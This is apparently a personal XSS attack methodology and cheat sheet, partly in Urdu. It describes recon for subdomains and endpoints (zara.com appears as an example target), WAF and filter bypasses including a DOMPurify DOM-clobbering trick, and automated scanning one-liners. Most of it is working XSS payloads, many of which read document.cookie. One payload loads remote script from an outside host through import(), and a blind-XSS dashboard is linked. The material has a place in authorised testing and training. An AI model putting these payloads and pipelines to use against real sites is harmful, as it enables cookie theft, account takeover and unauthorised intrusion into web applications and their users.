🏴‍☠️My XSS Attack Methodology

Blind XSS ----> https://xss.report/dashboard

https://www.endmemo.com/unicode/ascii.phpwww.endmemo.com

block with bypass Decimal NCR and add extra 00000 like: &#0000000040

UTF-8 encoder/decodermothereff.in

utf-8 encoding

jjencode - Encode any JavaScript program using only symbolsutf-8.jp

Situational, but also good to know about.

aurebesh.jsaemkei

needs some extra chars ontop of JSFuck, but may be useful if space is limited along with a loose filtering.

Not found

Not found

https://brutelogic.com.br/utils/charref.htmbrutelogic.com.br

Unicode Decoder & Encodermagictool.ai

URL Encode and Decode - OnlineURL Encode

HTML entity encoder/decodermothereff.in

JSFuck - Write any JavaScript with 6 Characters: []()!+jsfuck.com

Translate arbitrary javascript to executable javacript using only 6 characters. Only downside is that complex javascript payloads can get very long

How to check for Cross-Site-Scripting

• Find web Extention:

• find Extention in Burp Proxy History

• looking for an extension in Katana URLS

• find Extention using Google Dorking:

• site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?

• Find Endpoint:

• find Endpoints in Burp Proxy History

• Fuzzing Endpoints with Same Extention Wordlist Using ffuf

• Find Endpoints using GoLinkFinder: GoLinkFinder -d https://*.com | grep .asp

• Find Endpoints using Google Dorking:

• site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?

• Let’s say I want to Search paths after Google.com/api/* all you have to do is Using this URL

http://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from=

• I want to Paths ( Paste Code in the Console )

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g,jsRegex=/(?<=(\"|\'|\%60))(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'%60]*)?(?=(\"|\'|\%60))/g;const results=new Set;const paramMap=new Map();const jsFiles=new Set();function processContent(t,src){var e=t.matchAll(regex);for(let r of e){results.add(r[0]);var params=r[0].split('?')[1];if(params){params.split('&').forEach(param=>{var [key,]=param.split('=');if(key){if(!paramMap.has(key)){paramMap.set(key,[]);}paramMap.get(key).push(src||'Inline script or HTML');}});}}var j=t.matchAll(jsRegex);for(let r of j){jsFiles.add(r[0]);}}for(var i=0;i<scripts.length;i++){var t=scripts[i].src;if(t){jsFiles.add(t);fetch(t).then(function(t){return t.text()}).then(text=>processContent(text,t)).catch(function(t){console.log("An error occurred: ",t)});}else{processContent(scripts[i].textContent);}}var pageContent=document.documentElement.outerHTML;processContent(pageContent,'Page content');function writeResults(){var div=document.createElement("div");div.style.cssText="position:fixed;top:0;left:0;width:100%;height:100%;background:#f0f8ff;color:#333;overflow:auto;z-index:9999;padding:20px;font-family:Arial,sans-serif;";var content="<h2 style='color:#4a69bd;'>Endpoints Found: " + results.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";content+=Array.from(results).map(endpoint=>{var fullUrl=endpoint.startsWith("http")?endpoint:window.location.origin+endpoint;return "<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + endpoint + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + fullUrl + "</a></div>"}).join("");content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>Parameters Found:</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";paramMap.forEach((sources,param)=>{content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + param + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + sources.join('<br>') + "</div>";});content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>JS Files Found: " + jsFiles.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr;gap:10px;'>";jsFiles.forEach(file=>{var fullUrl=file.startsWith("http")?file:window.location.origin+file;content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + file + "</a></div>";});content+="</div>";div.innerHTML=content;var closeBtn=document.createElement("button");closeBtn.textContent="Close";closeBtn.style.cssText="position:fixed;top:10px;right:10px;background:#4a69bd;color:white;border:none;padding:10px 20px;cursor:pointer;";closeBtn.onclick=function(){document.body.removeChild(div);};div.appendChild(closeBtn);document.body.appendChild(div)}setTimeout(writeResults,3000);})();

• Find Parameter:

• fuzzing Parameter with Aurjun or using Paraminer and Gap Burp ext or Google Dork

• Fuzzing Parameter with Parameter Wordlist Using ffuf

• Find a Parameter with x8 ./x8 -u http://website.com/Path.php -w wordlist.txt

• find the Parameter Manually in the (view-source:) and the DOM (Inspect element) for things such as <input id='param1' name='param1'>

• find the Parameter Manually in .js files (look for var = , ="" , ='')

• find Manually going through the website to find all possible endpoints with parameters

• بڑی کمپنیاں بہت سارے اختتامی مقامات پر پیرامیٹر کے ناموں کو دوبارہ استعمال کرتی ہیں۔

• How to Test XSS:

• first, Type Simple input like asad and realize that input was reflected on the page or source code

• Use "Reflection Burp Extention" to Check What Parameter was reflected on the page or source code

• Finds multiple parameters that get reflected using the GXSS Tool

• if reflected then put ">asad and check if it escapes the area where it is reflected

• Find the blacklisted/filtered Symbols using KXSS Tool

• Find the blacklisted/filtered Symbols using isXSS-Burp Extention

• Find the Manually blacklisted/filtered Symbols: ">'<x

• Observe what tags are blocked by WAF and which keywords are allowed:

• (script, iframe, img, body, svg, etc.)

• Second, realize that one by one what Specious Symbols are Encoded or Not

• Try Character Encoding (URL encoding, Double URL encoding, UTF-8 Unicode encoding, Long UTF-8 Unicode encoding, Hex encoding, Base64 encoding, HTML entity encoding, jsFuck encoding, etc.)

• Try XSS using HTML quote encapsulation

• Try URL string evasion

• Create the payload list according to the allowed keywords Using Unblock Symbols and Script tags and javascript Event handler

• Brute-force the application with the XSS payload list you just created

• and Trying that input Get Out from an input HTML Tag like this:

• --></style></style></noscript></style></noscript></script></style></noscript></script></xmp></style></noscript></script></xmp></template></style></noscript></script></xmp></template></noembed><svg/onload=alert(document.domain)>

----------------------------------------------------------------

My Strategy to find XSS

-----------------------------------------------------------------

                  XSS Testing K liye Hummy website ki All Live Subdomains Chiye.
				  
* knockpy -d zara.com --recon --bruteforce
--------------------------------------
* ffuf -u https://FUZZ.zara.com  -w /home/kali/Downloads/best-dns-wordlist.txt
--------------------------------------
* Google Dork: site:*.domain.com -www
--------------------------------------
* Google Search: https://crt.sh
--------------------------------------
1: sublist3r -d zara.com -o sublist3r.txt   
2: subfinder -d zara.com -o subfinder.txt   
3: amass intel -d zara.com -whois -o amass.txt      
4: assetfinder --subs-only zara.com > assetfinder.txt
5: findomain -t zara.com -u findomain.txt   
6: cat assetfinder.txt Subfinder.txt Sublist3r.txt amass.txt > subdomains.txt  
7: sort -u subdomains.txt > sort.txt  
8: cat sort.txt | httprobe | uniq > live.txt
9: cat live.txt | httpx -title -probe -status-code -content-length -tech-detect -fr
--------------------------------------
                  
//XSS Testing K liye Hummy website ki all specific endpoint.js bhi files Chiye

$ katana -u https://website.com -jc -d 2 | grep ".js$" | uniq | httpx -mc 200,302 | sort > js_files.txt

//find hidden hidden endpoint parameters in js_files.txt

$ xnLinkFinder -i target_js.txt -sf https://target.com  -o js_final.txt

$ httpx -l js_final.txt --mc 200

$ ffuf -u https://target.com/FUZZ -w js_final.txt -o endpoint.txt

$ Arjun -u https://target.com/Enpoint -w Parameter.txt

//Search Manual fo DOM in endpoint.js files (look for innerHTML,  var =  getParameter() parameter pathname document.write(, document.cookie, location.href, redirectUrl, window.hash ) returnUrl.
--------------------------------------

//XSS Testing K liye Hummy website k all endpoints or parameters Chiye. 
				  
1: sub su pehly hum website ko explore karen gy her ek page ko visit kar k all endpoints or parameters ki ek ek Seprate List bana len gy.
or website ko explore karty time hum her ek endpoint ko check karen gy k wo source-code me reflect ho raha ha ya nahi Path Based injection k liye.
--------------------------------------

2: Phir hum Google Dork se all endpoints or parameters ko usi duno lists me add karlen gy.
site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?
--------------------------------------

3: Phir hum Fuzzing Endpoints with the Same Extention (Assetnote Wordlists) Using ffuf phir inko Endpoints wali List me Add kar len gy.
--------------------------------------

4: Phir Archive URL se all endpoints or parameters ko filter kar k usi duno lists me add karlen gy.
http://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from=
$ cat all.txt | grep "=" | uro | httpx -mc 200,301,302 > parameter.txt
$ cat parameter.txt | httpx -status-code -content-length -cdn -method -fr -mc 200
$ cat all.txt | grep ".php$" | uro | httpx -mc 200,301,302 > endpoint.txt
$ cat endpoint.txt | httpx -status-code -content-length -cdn -method -fr -mc 200
--------------------------------------

//if search automate:

$ cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
$ cat xss_fuzz.txt | freq | tee -a possible_xss.txt
--------------------------------------

5: Phir parameters list ki one by one Reflection check karen gy, if Reflrcted then bypass according to reflected Location in Sorce-Code.
--------------------------------------

6: Phir hum one by one Endpoints ho Check Karen gy for Find Parameters with Aurjun or with x8 or param miner.
--------------------------------------

7: Phir hum in endpoints se find hony waly parameters ki one by one Reflection check karen gy if Reflrcted then bypass according to reflected Location in Sorce-Code.
--------------------------------------

8: XSS probe: test to reflection:  '"><
--------------------------------------

9: if reflected then use:  <u/onmouseover=alert(1)>test123
--------------------------------------

10: if not working then use: <img src=x onerror=import('https://x55.is')>  or <a autofocus contenteditable onfocus=alert(1)>focus this!
--------------------------------------
  
Remember Notes: 

1: Allways See Reflection in Dom-inspect in Sorce-Code and find hidden parameters to type: name= or id= or <form or value="" or hidden in source-code: <input type="hidden" name="t" value="1">
2: Check Reflection according to Location Classification:
◉ inside a tag:  <input type="hidden" name="t" value="asad">
◉ Between tags: <h1> Results for: asad </h1>
◉ inside a script section: 
<script>
	var tracking = { type: '1', query: 'asad'};
	/* post it to some address */
</script>
3: Observe what Unblock or Unfiltered Symbols: [ " ' < > / \ ( ) ` { } ]
4: Observe what tags are blocked by WAF and which keywords are allowed: (<script>, <a>, <iframe>, <img>, <body>, <svg>, etc.)
5: Create a payload according to the allowed keywords or Using Unblock Symbols and Script tags and javascript Event handler.
6: how to add the target in advance scope in burp suite.
.*\.google\.com
.*google.*
-----------------------------------------------------------------

Note: Double URL encoding can be tried since the first decoding process is performed by HTTP protocol and the resultant encoded URL will bypass the XSS filter.

<imsofake onpointerrawupdate=alert(1)>touch
<Img Src=OnXSS OnError=confirm(document.cookie)>
<iframe src=javascript:alert(document.cookie)>
"><svg onload="alert(document.cookie)">
'"><script>alert(1)</script><h1>d</h1>
"><img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(document.domain)>
<a href='#' onclick='alert("document.cookie")'>Click me</a>
<Img+Src=javascript:alert(1)+OnError=location=src>
<video src=1 href=1 onerror="javascript:alert(document.cookie)"></video> 
<div onpointerover="alert(document.cookie)">MOVE HERE</div>
<input onfocus='alert("document.cookie")' autofocus>
<details/open/ontoggle="alert`document.cookie`">
<xmp><p title="</xmp><svg/onload=alert(document.cookie)>">
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document.cookie)>
<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='></object>
<script/&&input1=FOOBAR&input1=>alert('@Synack');</script>

----------------------------------------------------------------

Bypass <script> Tags

<img src="" onerror="alert()">
<body onload="alert()">

----------------------------------------------------------------

To Bypass common xss tags filters like <script>, <img>, <a>, <body>…

<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>

----------------------------------------------------------------

Bypass using javascript inside a string

<script>
foo="text </script><script>alert(1)</script>";
</script>

----------------------------------------------------------------

Bypass email filter

"><svg/onload=confirm(1)>"@x.y
"><svg/onload=alert(1)>"@x.y

----------------------------------------------------------------

XSS Filter removes script characters Bypass

1. Now, if we try to inject <script>alert(1)</script>, it won’t work

2. then I try to inject <img src=x onerror=alert(1)>

3. In this case, we’ve used a handy little feature called HTML Event Attributes.

----------------------------------------------------------------

XSS Filter removes alert characters Bypass

if a blacklisted word is “alert”,

prompt(1), confirm(1), console.log(1), document.write(1)

----------------------------------------------------------------

XSS Filter removes Strings are blocked Bypass

1. Sometimes you will run into situations where you can not form a string, maybe because quotes are blocked, or some other reason.

2. In this case, String.fromCharCode can be handy. It takes ASCII codes, and then turns them into a string, for example, this payload:

3. then I try to inject <alert(Strings.fromCharCode(88,83,83))

4. Will create an alert box with the characters corresponding to 88, 83, and 83. Which just happens to be an XSS alert.

----------------------------------------------------------------

XSS Filter removes () characters Bypass alert`1`

1. First Payload > HTML entity encode then > URL encode

HTML entity encoder/decodermothereff.in

URL Encode and Decode - OnlineURL Encode

----------------------------------------------------------------

XSS Filter removes <> characters Bypass

1. we can use onfocus event handler and then autofocus the input to trigger your code.

"onfocus=alert(document.cookie) autofocus="

----------------------------------------------------------------

XSS Filter removes /[A-Za-z0-9]/ characters Bypass

1. in case Parameter Value replaces all alphanumeric characters with an empty string. Solutions:

2. So we can use something like JSFuck, which converts your javascript code into valid non-alphanumeric esoteric javascript.

3. First Payload > JSFuck encode then > URL encode

JSFuck - Write any JavaScript with 6 Characters: []()!+jsfuck.com

----------------------------------------------------------------

XSS Filter removes !-/#&;% characters and Sink in Comment "<!--<p> parameter value </p> -- >" Bypass

1. The value of the GET parameter debug ends up inside a comment which is then inserted to the DOM via innerHTML.

2. The problem is that there's a filter, which removes !-/#&;% characters. But <php> it mutates into <!--php-- >, because browsers don't like to render PHP sources if sent accidentally.

3. This mutation creates a new comment, which will be nested inside the already existing one.

4. However there's no concept of nested comments in HTML, hence the new comment breaks the old comment and lets us execute Javascript.

5. Payload:

<?php><svg onload=alert(1337)>

<!-- Also works because, <?> is short for <php> -->
<?><svg onload=alert(1337)>

HTML Standardhtml.spec.whatwg.org

----------------------------------------------------------------

XSS Filter removes `'"+-!\[] and alert characters Bypass

1. in case To bypass this, we can simply use regex to get the string, lowercase it, and feed it to Function.

Function(/ALERT(1337)/.source.toLowerCase())()

Or

eval(8680439..toString(30))(1337)

Or even better,

eval(location.hash.slice(1))

and then add #alert(1337) to the URL to make it work. like: eval(location.hash.slice(1))#alert(document.cookie)

Not found

----------------------------------------------------------------

XSS Filter DOMPurify.Sanitize Function Bypass

1. So we can use DOM Clobbering. By injecting HTML elements into the DOM, we can create Javascript variables.

2. So in our case, we need to create a variable ok. To do so, we'll create an Anchor Tag because if we create an anchor tag with the id set to ok, then the browser automatically creates a variable named ok in Javascript.

3. There's another reason why we chose the anchor tag and it's because, when toString() is called on an anchor tag, it returns the href property of that anchor tag object.

4. This is useful because not only we can control the variable creation, but also its string value.

5. so it calls the toString() on it which returns the href property that gets executed.

<a id=ok href=tel:alert(1337)>

Things to note:

• href cannot be any arbitrary string, it has to follow protocol:host format, if the string doesn't follow the format, its value will be BaseURL/yourString.

• tel:alert(1337) is also a valid Javascript, because it follows label:code syntax.

• tel is used because it's whitelisted as one of the safe protocols to be allowed by DOMPurify.

DOM Clobbering - The Spannerwww.thespanner.co.uk

----------------------------------------------------------------

Payload Encode to Bypass Firewall

https://www.endmemo.com/unicode/ascii.php

----------------------------------------------------------------

Stored XSS in the address field in billing activity at in Shopping Cart

1. Go to https://shop.com

2. click on any products like t-shirt

3. Add that to the cart and

4. click on proceed enter xss payload a"><svg/onload=prompt(1)> in every address field 5. and click on OK Proceed xss will popup

Summary:

• input an xss payload which produces a popup in the address fields.

• Submit.

• Each time that order address is viewed the XSS will fire.

----------------------------------------------------------------

TOP XSS Payloads

"><img src="x" onerror="alert(document.cookie)">

"><img src=x onerror=alert(document.cookie)>

"><svg onload=alert(document.cookie)>

"><iframe src=javascript:prompt(document,cookie)>

 "><iframe src=javascript:prompt(1)>

"><svg onload=alert(1)>

"><img src=x onerror=alert(1)>

"><img src="x" onerror="alert(1)">

"><img src/onerror=prompt(document.cookie)>

"><!--<img src="--><img src=x onerror=alert(37)//">

"><img src=a onerror=alert(1)>123@sdf.com

"><a href=javascript:alert(document.domain);>Click Hare</a>

"><img src="x" onerror="window.open('https://google.com/');">

javascript%3Aalert%2F**%2F(document.domain)

javascript:alert(document.domain)

"><img src="x" onerror="window.open('https://google.com/');">

"onmouseover=alert(document.domain)//

"onmouseover=alert(document.cookie)//

X-Forwarded-Host: bing.com"><img src/onerror=prompt(document.cookie)>

<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>

<svg<0x0c>onload=alert(1)><svg>

<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>

'><details/open/ontoggle=confirm(document.location)>/

'onmouseover='alert(document.cookie)'

----------------------------------------------------------------

Bypass Filter for Stored DOM XSS

<><img src=1 onerror=alert(document.cookie)>

----------------------------------------------------------------

DOM XSS With JSON Request

"-alert(1)}//

----------------------------------------------------------------

DOM XSS in AngularJS

{{$on.constructor('alert(document.cookie)')()}}

----------------------------------------------------------------

In JavaScript, several events can be used to trigger Cross-Site Scripting (XSS) payloads

- onabort: This event is triggered when an image fails to load.
- onerror: This event is triggered when an error occurs or an image fails to load.
- onload: This event is triggered when an object has loaded.
- onchange: This event is triggered when the content of a form element, the selection, or the checked state has changed (for <input>, <select>, <textarea>).
- onsubmit: This event is triggered when a form is submitted.
- onreset: This event is triggered when a form is reset.
- onselect: This event is triggered after some text has been selected in an element.
- onblur: This event is triggered when an element loses focus.
- onfocus: This event is triggered when an element receives focus.Pyload= "onfocus=alert(1337) autofocus="
- onkeydown: This event is triggered when a key is pressed.
- onkeypress: This event is triggered when a key is pressed and released.
- onkeyup: This event is triggered when a key is released.
- onclick: This event is triggered when an element is clicked.
- ondblclick: This event is triggered when an element is double-clicked.
- onmousedown: This event is triggered when a mouse button is pressed.
- onmousemove: This event is triggered when the mouse is moved.
- onmouseout: This event is triggered when the mouse is moved off an element.
- onmouseover: This event is triggered when the mouse is moved over an element.
- onmouseup: This event is triggered when a mouse button is released.

These events can be used to trigger XSS payloads in different contexts, depending on the specific event and the structure of the HTML document..

----------------------------------------------------------------

Cross-site Scripting (XSS) Cheat Sheet

Basic Payload: <SCRIPT>alert()</SCRIPT>

HTML tag: we can insert our script inside some HTML attributes, like, for example, onerror or onload
<img src=”/” onload=”alert();” />

HTML attributes: some attributes like src and href can run Javascript code:
<a href="javascript:alert();" />

Script src: allows to load a file inline:
<script src="data:text/javascript,alert()"></script>

----------------------------------------------------------------

DOM-Based XSS Used the following JavaScript payloads:

<script>alert(document.domain</script>
"><img src=x onerror=alert(document.cookie)>
javascript:alert(document.domain)
#data:text/javascript,alert(document.domain)
?next=javascript:alert(document.domain)
'onmouseover='alert(document.cookie)'
input_value');alert(')

----------------------------------------------------------------

Tip 2: when you see function redirect you but not reflected in source page try to but xss payload my you can get dom xss

Tip3: Always Check ?returnurl=, ?next= and other redirection parameters before login.

----------------------------------------------------------------

Automated XSS Finding ParamSpider | GXSS | Dalfox

1. python3 /home/kali/tools/recon/ParamSpider/paramspider.py --domain http://testphp.vulnweb.com -o /home/kali/file.txt

2. cat /home/kali/file.txt | /root/go/bin/Gxss

3. cat /home/kali/file.txt | /root/go/bin/Gxss -p asad

4. cat /home/kali/file.txt | /root/go/bin/Gxss -p asad | /root/go/bin/dalfox pipe --mining-dict --skip-bav

----------------------------------------------------------------

Automated XSS Finding Waybackurls | Gf Pattern | Dalfox

1. waybackurls http://testphp.vulnweb.com >> file.txt

2. catfile.txt | gf xss

3. catfile.txt | gf xss | sed 's/=.*/=/'

4. cat file.txt | gf xss | sed 's/=.*/=/' | dalfox pipe

----------------------------------------------------------------

Automated XSS Finding ParamSpider | kxss | Dalfox

1. python3 /home/kali/tools/recon/ParamSpider/paramspider.py --domain http://testphp.vulnweb.com -o /home/kali/file.txt

2. cat /home/kali/file.txt | /root/go/bin/kxss

3. /root/go/bin/dalfox url http://testphp.vulnweb.com/listproducts.php?artist=

----------------------------------------------------------------

(1) One-Liner XSS Finding

echo http://testphp.vulnweb.com | waybackurls | grep "=" | uro | qsreplace '"><img src=x onerror=confirm(origin)>' | freq

----------------------------------------------------------------

(2) One-Liner XSS Finding

waybackurls http://testphp.vulnweb.com | grep '=' | qsreplace '"><img src=x onerror=confirm(origin)>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<img src=x onerror=confirm(origin)>" && echo "$host \033[0;31m" Vulnerable;done

----------------------------------------------------------------

(3) One-Liner XSS Finding

waybackurls http://testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | /root/go/bin/airixss -payload "confirm(1)" | egrep -v 'Not'

----------------------------------------------------------------

(4) One-Liner XSS Finding

echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq

----------------------------------------------------------------

(5) One-Liner XSS Finding

echo http://testphp.vulnweb.com | waybackurls | kxss (search parametar xss)

----------------------------------------------------------------

(6) One-Liner XSS Finding

echo http://testphp.vulnweb.com  | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

----------------------------------------------------------------

(7) One-Liner XSS Finding

cat targets.txt | gf xss | grep 'source=' | qsreplace '"><script>confirm(1)</script>' | while read host do ; do curl -silent -path-as-is -insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host 33[0;31mVulnerablen";done

----------------------------------------------------------------

(8) One-Liner XSS Finding

cat file.txt | while read h do;do curl -sk --insecure "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && \echo "$h \033[0;31mVul\n" || echo "$h \033[0;32mNot\n";done

----------------------------------------------------------------

(9) One-Liner XSS Finding

cat file.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"

----------------------------------------------------------------